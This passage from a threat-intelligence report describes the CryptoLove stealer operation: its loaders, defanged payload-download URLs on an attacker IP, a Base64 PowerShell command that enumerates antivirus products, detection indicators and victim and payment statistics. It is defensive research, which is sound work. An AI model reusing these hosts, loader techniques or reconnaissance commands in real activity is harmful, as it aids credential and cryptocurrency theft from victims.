With the updated launcher written in .NET, the launcher sends out the request to hxxps://apikokoapi[.]com/add_code.php?method=get&code=code_entered if the response contains the “true” statement for the code, indicating that it’s valid (The JSON response from the server would look like the following: {“available”:true,”code”:”XYZ”,”username”:”#worker_handle”}), the launcher would retrieve the payload from 77.105.166[.]229/qicudt52b.dll. Other POST requests to log and register the device are sent to hxxps://service-government[.]com/api.php.

qicudt52b.dll is a DLL loader with a PDB path
C:UsersАдминистраторDocumentsPe-Loader-Sample-masterReleasePe-Loader-Sample.pdb, which is an open-source loader project. The injection leverages the process hollowing technique. The DLL executes one of the payloads fetched from the hardcoded URLs:

• hxxp://77.105.166[.]229/beast2 — LummaC2 Stealer
• hxxp://77.105.166[.]229/beast1 — StealC

It’s worth noting that some affiliates can have their Build names for LummaC2 and StealC, for example:

• ObmantVault — obman
• Yellow Empire — yellow
• Mr. Best — beast
• PROFIT Team — profitable (observed the same Build ID across multiple affiliates)

They continue using them despite saying they have moved away from the stealers.

Later, in November 2024, CryptoLove switched to using a different loader named Morpheme. The loader would drop LummaC2, StealC, or Rhadamanthys stealers.

The loader leverages reflective loading techniques to dynamically allocate, load, and execute a payload within the current process. It also uses the AsmJit library to facilitate dynamic memory allocation and manage the executable payload. The APIs in the Morpheme loader are encrypted using simple XOR. The loader has many garbage functions, making it time-consuming for analysts to reverse.

Detection

• Look for the following folder creations under C::
  – Cache_clientx86
  – [a-f0–9]{32}Morpheme32.exe
• Inspect the network pattern where the URL ends with .php?status=1&wallets=0&av=0&worker=NONE&promo=NONE (initial network connection to the server).
• Look for additional payload retrieval evidence from:
  – 77.105.166[.]229/second
  – 77.105.166[.]229/first
• The launcher uses a Base64-encoded PowerShell command to enumerate the antivirus products:

C:WindowsSysNativeWindowsPowerShellv1.0powershell.exe -inputformat none -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('W0NvbnNvbGVdOjpPdXRwdXRFbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjgKJEFudGl2aXJ1c1Byb2R1Y3RzID0gR2V0LVdtaU9iamVjdCAtTmFtZXNwYWNlICJyb290XFNlY3VyaXR5Q2VudGVyMiIgLUNsYXNzIEFudGlWaXJ1c1Byb2R1Y3QKCmZvcmVhY2ggKCRQcm9kdWN0IGluICRBbnRpdmlydXNQcm9kdWN0cykgewogICAgV3JpdGUtSG9zdCAkUHJvZHVjdC5kaXNwbGF5TmFtZQp9')))"

Which decodes to:

[Console]::OutputEncoding = [System.Text.Encoding]::UTF8
$AntivirusProducts = Get-WmiObject -Namespace "rootSecurityCenter2" -Class AntiVirusProduct
foreach ($Product in $AntivirusProducts) {
    Write-Host $Product.displayName
}

For Sigma rules, please refer to the GitHub page.

Summarization of Victims

From November 2, 2022, to November 25, 2024, 22,105 victims’ IPs were available; we can only share the victims’ IPs with law enforcement if needed.

Here is the summary of the IPs based on the country:

• https://ipinfo.io/tools/summarize-ips/8f1e370e-937b-4088-96f0-670252fda333

Although the first entry in the profit records channel was made on May 9th, 2022, it wasn’t until May 21st, 2024, that the CryptoLove payments records included the IP address of the alleged victim from whom money was stolen, along with the landing page used by CryptoLove that enabled the worker to retrieve the log from the victim. The format used for these announcements of a successful payment is:

Up to this day, there have been 393 alleged successful payments to workers from victims worldwide, following the format mentioned above. Please note that these payments to workers represent a percentage of the amount stolen from the victim, and this percentage varies depending on the affiliate’s rules for each landing.

The highest payment was made to worker #Genatop4ik in the Orbit project on March 18th, 2024. The PROFIT Team is still using this landing page. The amount paid was a total of $186,328 to an undisclosed victim. MxDuke, the admin of the Profit Team, mentioned in an interview with Cryptolove that this amount represented 50% of the money stolen, totaling 372 thousand dollars in Solana.

If you believe you were a victim of Cryptolove at any point, please feel free to contact us for further assistance.

Additionally, you can reach out to us for more tips on detection and hunting tips.

Indicators of Compromise

The Indicators of Compromise:

References

https://github.com/TRACLabs1/Config_extractors/tree/main

https://github.com/abhisek/Pe-Loader-Sample/tree/master

https://gist.github.com/TRACLabs1/01eeb350cf7ae02ed8fddca0ec089f5f